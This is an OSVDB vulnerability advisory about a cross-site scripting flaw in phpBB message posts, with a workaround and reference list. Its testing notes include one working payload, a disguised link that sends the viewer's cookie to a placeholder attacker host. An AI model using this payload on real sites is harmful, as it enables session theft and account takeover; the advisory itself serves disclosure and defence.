phpBB JavaScript Message Content XSS

2003-08-19T08:58:18
ID OSVDB:2145
Type osvdb
Reporter OSVDB
Modified 2003-08-19T08:58:18

Description

Vulnerability Description

phpBB contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate javascript upon submission during message posts. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Completely disable HTML posting in the phpBB software.

Short Description

phpBB contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate javascript upon submission during message posts. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

The example below will send the user's cookie to a malicous web site:

<a href="javascript:document.location.replace('http://[attacker]/cgi-bin/evil.cgi?stolen_cookie='+ document.cookie);">Click me, I'm innocent</a>

References:

Vendor Specific Advisory URL Secunia Advisory ID:9567 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-08/0266.html ISS X-Force ID: 10696 CERT: CA-2000-02 Bugtraq ID: 6248